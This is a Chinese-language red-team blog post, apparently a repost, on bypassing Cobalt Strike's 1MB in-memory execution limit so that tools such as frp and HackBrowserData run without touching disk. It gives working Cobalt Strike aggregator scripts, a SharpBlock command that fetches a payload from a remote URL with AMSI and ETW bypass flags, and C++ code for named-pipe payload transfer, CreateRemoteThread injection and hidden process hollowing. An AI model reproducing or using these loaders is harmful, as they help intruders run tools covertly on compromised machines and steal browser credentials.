Bypass Cobalt Strike 1MB | 长亭百川云

0x00 前言

在攻防中经常会使用到frp,HackBrowserData等工具，常规的落地使用远不如在内存中直接加载省事/OPSEC，但因inject/execute-assembly等有着1mb的限制，所以需要另辟蹊径

0x01 利用现有工具

SharpBlock(需要.net4.0)

1.远程加载

execute-assembly SharpBlock.exe -e https://image.com/frp -s c:\windows\system32\notepad.exe -a "-c c:\frpc.ini" --disable-bypass-amsi --disable-bypass-cmdline --disable-bypass-etw

注意 image 中因为是用了cna的方式，所以-a 参数时因为frpc的参数为 -c" "xxx.ini 所以你需要给空格包裹一下，如果你是execute-assembly那就没有这个问题了。另外这是ini落地的写法，如果你已经将frp修改为了无参数启动那就是一键一把梭了。

加入下面的代码以支持https

ServicePointManager.ServerCertificateValidationCallback += (sender, certificate, chain, sslPolicyErrors) => true;

‍

2.named pipe

原版的SharpBlock因frp等文件太大，导致Payload传输不完整。其原因还是CS本身单次传输数据大小的问题，且原版SharpBlock只接收一次数据就会关闭管道，所以也不太适合大文件的使用

此处使用秋水fix过的版本

https://github.com/Like0x/SharpBlock

可以看到这是一个接近4M的PE文件。

使用pipe传输，无落地直接执行，修改项目中提供的cna即可

0x02 C++ named pipe

因.net 4.0在实战中还是会碰到缺失的情况，所以用c++改了一份

2.1 实现

1.修改微软的example为RDI

https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipe-server-using-completion-routines

2.确认Payload是否传输完成

秋水使用的方式是在Payload传输完后发送ok作为标识符，关闭pipe进入下一步

`alias frp {`    `$handle = openf(script_resource("frpc_windows_x64.exe"));`    `$data = readb($handle,-1);`    `closef($handle);``   `    `bupload_raw($bid,"\\\\.\\pipe\\pipename",base64_encode($data));``   `    `# This code turn off Pipeserver`    `for ($total = 0; $total < 5; $total++)`    `{`        `bpause($bid,100);`        `bupload_raw($bid,"\\\\.\\pipe\\pipename","ok");`    `}``}`

我选择使用cna计算Payload的大小，传参给DLL

`alias test {  ``  $handle = openf(script_resource("frpc_windows_x64.exe"));`  `$data = readb($handle, -1);`  `closef($handle);`  `$size = strlen($data);`  `blog($1,"file size ".$size);`  `bdllspawn($1,script_resource("pipe.dll") , $size, "", 1000, false);``}`

size = atoi((char*)lpReserved);

`recv_total += cbBytesRead;``memcpy(temp, lpPipeInst->chRequest, cbBytesRead);``temp += cbBytesRead;``if (recv_total == size)``{``printf("[loader] recv all %02d bytes\r\n", recv_total);``   `

3.传输完成后关闭pipe结束进程

DisconnectNamedPipe(hPipe);

2.2 inject

1.frpc pe2shellcode

https://github.com/TheWover/donut

2.Demo

常规的CreateRemoteThread测试

`recv_total += cbBytesRead;``memcpy(temp, lpPipeInst->chRequest, cbBytesRead);``temp += cbBytesRead;``if (recv_total == size)``{`    `printf("[loader] recv all %02d bytes\r\n", recv_total);`    `PROCESS_INFORMATION pi = { 0 };`    `STARTUPINFO si = { 0 };`    `CreateProcess(NULL, "notepad.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);`    `remoteBuffer = VirtualAllocEx(pi.hProcess, NULL, recv_total + 1, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);`    `WriteProcessMemory(pi.hProcess, remoteBuffer, shellcode, recv_total, NULL);`    `remoteThread = CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);`    `CloseHandle(processHandle);`    `DisconnectNamedPipe(hPipe);``   ``}`

https://github.com/dust-life/Tools/tree/main/Named\_Pipe

2.3 run_pe

考虑到pe2shellcode有诸多不便，选择使用Process Hollowing并稍作修改

https://github.com/hasherezade/libpeconv/tree/master/run\_pe

1.从内存加载Payload

`BYTE* memory_load(IN BYTE* payload, IN size_t r_size, OUT size_t& v_size, bool executable, bool relocate)``{`    `BYTE* mappedPE = load_pe_module(payload, r_size, v_size, executable, relocate);`    `free_pe_buffer(payload);`    `return mappedPE;``}`

2.隐藏窗口

`if (!CreateProcessA(`        `path,`        `(LPSTR)cmdLine,`        `NULL, //lpProcessAttributes`        `NULL, //lpThreadAttributes`        `FALSE, //bInheritHandles`        `CREATE_SUSPENDED | DETACHED_PROCESS | CREATE_NO_WINDOW, //dwCreationFlags`        `NULL, //lpEnvironment``        NULL, //lpCurrentDirectory`        `&si, //lpStartupInfo`        `&pi //lpProcessInformation``))`

3.忽略修复重定位表

upx过后的PE没有重定位表，所以需要忽略修复重定位表

`if (!relocate_module(loaded_pe, payloadImageSize, (ULONGLONG)remoteBase)) {`    `std::cout << "Could not relocate the module!\n";`    `//3. Update the image base of the payload (local copy) to the Remote Base:`    `update_image_base(loaded_pe, (ULONGLONG)remoteBase);``}``else``{`    `update_image_base(loaded_pe, (ULONGLONG)remoteBase);``}`

4.Demo

https://github.com/dust-life/run\_pe

0x03 TODO

`1.Bypass Cmdline、ETW等``2.更好的Process Hollowing``3.BOF版远程加载、Process Hollowing`